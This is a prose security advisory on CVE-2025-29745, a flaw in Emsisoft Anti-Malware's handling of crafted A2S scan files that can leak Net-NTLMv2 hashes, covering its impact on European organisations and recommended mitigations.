CVE-2025-29745 is a vulnerability identified in the scanning module of Emsisoft Anti-Malware software versions prior to 2024.12. The flaw allows a remote attacker to exploit the handling of a specially crafted A2S extension file, which is a custom scan file format used by Emsisoft. By leveraging this vulnerability, an attacker controlling a remote server can induce the victim's Emsisoft Anti-Malware product to process the malicious A2S file, resulting in the disclosure of Net-NTLMv2 hash information. Net-NTLMv2 hashes are challenge-response authentication hashes used in Windows network authentication protocols. Exposure of these hashes can enable attackers to perform offline brute-force or relay attacks to impersonate legitimate users or escalate privileges within a network. The vulnerability does not require prior authentication but depends on the victim interacting with or scanning the malicious A2S file, which may be delivered through various vectors such as email, network shares, or compromised websites. No public exploits have been reported yet, and no CVSS score has been assigned. The vulnerability was reserved in March 2025 and published in August 2025, indicating recent discovery and disclosure. The absence of patch links suggests that remediation may still be pending or not widely announced at the time of this report.

For European organizations, this vulnerability poses a significant risk to the confidentiality and integrity of network authentication credentials. Emsisoft Anti-Malware is widely used in Europe, especially among small to medium enterprises and some larger organizations valuing layered endpoint protection. The exposure of Net-NTLMv2 hashes could facilitate lateral movement, privilege escalation, and persistent access within corporate networks if attackers successfully capture these hashes. This is particularly concerning for sectors with high-value targets such as finance, healthcare, government, and critical infrastructure, where unauthorized access can lead to data breaches, operational disruption, and regulatory non-compliance under GDPR. The vulnerability's exploitation could undermine trust in endpoint security solutions and increase the attack surface by leveraging a trusted security product. Given the remote nature of the attack and the potential for stealthy credential harvesting, organizations may face challenges in detecting and mitigating intrusions stemming from this vulnerability.

Organizations should prioritize updating Emsisoft Anti-Malware to version 2024.12 or later once available, as this is expected to contain the fix for the vulnerability. Until patches are applied, it is critical to implement strict controls on the handling and scanning of A2S extension files, including blocking or quarantining such files from untrusted sources. Network segmentation and strict egress filtering can reduce exposure to remote servers hosting malicious files. Monitoring network traffic for unusual authentication attempts or NTLM relay activities can help detect exploitation attempts. Employing multi-factor authentication (MFA) for network access reduces the risk posed by compromised hashes. Security teams should also conduct targeted threat hunting for signs of lateral movement or credential dumping activities. Additionally, educating users about the risks of opening unknown or unsolicited scan files and reinforcing secure file handling policies will reduce the likelihood of successful exploitation.